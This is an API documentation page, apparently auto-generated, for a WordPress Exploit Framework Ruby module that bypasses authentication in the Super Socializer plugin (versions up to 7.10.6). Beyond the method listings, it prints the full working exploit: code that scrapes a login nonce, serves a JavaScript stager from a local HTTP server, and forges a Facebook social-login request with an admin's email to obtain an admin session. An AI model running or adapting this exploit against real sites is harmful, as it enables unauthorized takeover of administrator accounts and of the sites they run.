Class: Wpxf::Auxiliary::SuperSocializerAuthBypass
- Includes:
- Wpxf, Net::HttpServer
- Defined in:
- lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary collapse
-
#login_nonce ⇒ Object
Returns the value of attribute login_nonce.
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #fetch_nonce ⇒ Object
-
#initialize ⇒ SuperSocializerAuthBypass
constructor
A new instance of SuperSocializerAuthBypass.
- #on_http_request ⇒ Object
- #run ⇒ Object
- #stager ⇒ Object
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ SuperSocializerAuthBypass
Returns a new instance of SuperSocializerAuthBypass.
7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 7 def initialize super update_info( name: 'Super Socializer <= 7.10.6 Authentication Bypass', desc: %( Super Socializer <= 7.10.6 is vulnerable to an authentication bypass exploit if an attacker is in posession of an admin's e-mail address and the social login feature is enabled. This module will launch a HTTP server, which when visited will automate the bypass process, and provide an admin session. ), author: [ 'rastating' # WPXF module ], references: [ ['WPVDB', '9043'] ], date: 'Mar 03 2018' ) ([ StringOption.new( name: 'admin_email', desc: 'The e-mail address of the admin user to authenticate as', required: true ) ]) end |
Instance Attribute Details
#login_nonce ⇒ Object
Returns the value of attribute login_nonce.
153 154 155 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 153 def login_nonce @login_nonce end |
Instance Method Details
#check ⇒ Object
40 41 42 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 40 def check check_plugin_version_from_readme('super-socializer', '7.10.7') end |
#fetch_nonce ⇒ Object
122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 122 def fetch_nonce emit_info 'Fetching a login nonce...' res = execute_get_request(url: wordpress_url_login) return false unless res&.code == 200 pattern = /var\sthe_champ_sl_ajax_token\s=\s{"ajax_url":".+?","security":"([a-z0-9]+?)"};/i self.login_nonce = res.body[pattern, 1] if login_nonce.nil? emit_error 'Failed to fetch a login nonce' return false else emit_success "Found nonce: #{login_nonce}", true return true end end |
#on_http_request ⇒ Object
114 115 116 117 118 119 120 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 114 def on_http_request(*) emit_info 'Serving stager...' { type: 'text/html', body: stager } end |
#run ⇒ Object
139 140 141 142 143 144 145 146 147 148 149 150 151 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 139 def run return false unless super return false unless fetch_nonce address = http_server_bind_address address = 'localhost' if address == '0.0.0.0' emit_info "Visit http://#{address}:#{http_server_bind_port} to login." emit_warning 'If your browser blocks the popup, be sure to allow it.' start_http_server true end |
#stager ⇒ Object
44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 |
# File 'lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb', line 44 def stager %( <html> <head> </head> <body> <script> var url = '#{full_uri}', email = '#{datastore['admin_email']}', nonce = '#{login_nonce}'; function exploit() { var param = { action: 'the_champ_user_auth', security: nonce, 'profileData[id]': '#{Wpxf::Utility::Text.rand_alpha(6)}', 'profileData[link]': '#{Wpxf::Utility::Text.rand_alpha(6)}', 'profileData[name]': '#{Wpxf::Utility::Text.rand_alpha(6)}', 'profileData[email]': email, 'profileData[first_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}', 'profileData[last_name]': '#{Wpxf::Utility::Text.rand_alpha(6)}', provider: 'facebook', redirectionUrl: encodeURI(url) }; var wnd = OpenWindowWithPost("#{wordpress_url_admin_ajax}", "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param); setTimeout(function() { wnd.close(); window.location.replace("#{wordpress_url_admin}"); }, 2000); } function OpenWindowWithPost(url, windowoption, name, params) { var form = document.createElement("form"); form.setAttribute("method", "post"); form.setAttribute("action", url); form.setAttribute("target", name); for (var i in params) { if (params.hasOwnProperty(i)) { var input = document.createElement('input'); input.type = 'hidden'; input.name = i; input.value = params[i]; form.appendChild(input); } } document.body.appendChild(form); var wnd = window.open("", name, windowoption); form.submit(); document.body.removeChild(form); return wnd; } document.addEventListener("DOMContentLoaded", function(event) { exploit(); }) </script> </body> </html> ) end |